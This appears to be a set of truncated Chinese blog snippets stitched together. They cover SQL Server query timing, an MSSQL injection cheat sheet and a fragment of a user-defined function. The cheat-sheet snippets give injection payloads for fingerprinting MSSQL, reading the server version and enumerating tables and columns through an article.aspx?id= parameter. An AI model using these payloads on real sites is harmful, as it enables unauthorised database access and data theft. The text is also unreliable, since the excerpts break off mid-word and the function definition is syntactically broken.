代码1:查看sql的执行时间
SET STATISTICS PROFILE ON
SET STATISTICS IO ON
SET STATISTICS TIME ON
select * from Meeting;
SET STATISTICS PROFILE OFF
SET STATISTICS IO OFF
SET STATISTICS TIME OFF
...
MSSQL注入:
and exists (select * from sysobjects) //判断是否是MSSQL
and exists(select * from tableName) //判断某表是否存在..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_nam...
判断注入点:1、数字型ht2、字符型3、搜索型searchpoints%' and 1=1searchpoints%' and 1=2确定数据库类型:查询当前用户数据信息:article.aspx?id=1 having 1=1--暴当前表中的列:article.aspx?id=1 group by admi...
CREATE FUNCTION GET_STATUS(@CODES VARCHAR(20) RETURN VARCHAR(100)
AS
BEGIN
declare @status_list varchar(100)
declare @status_name varchar(20)
declare @
--1.init
set @status_list = ''
set @status...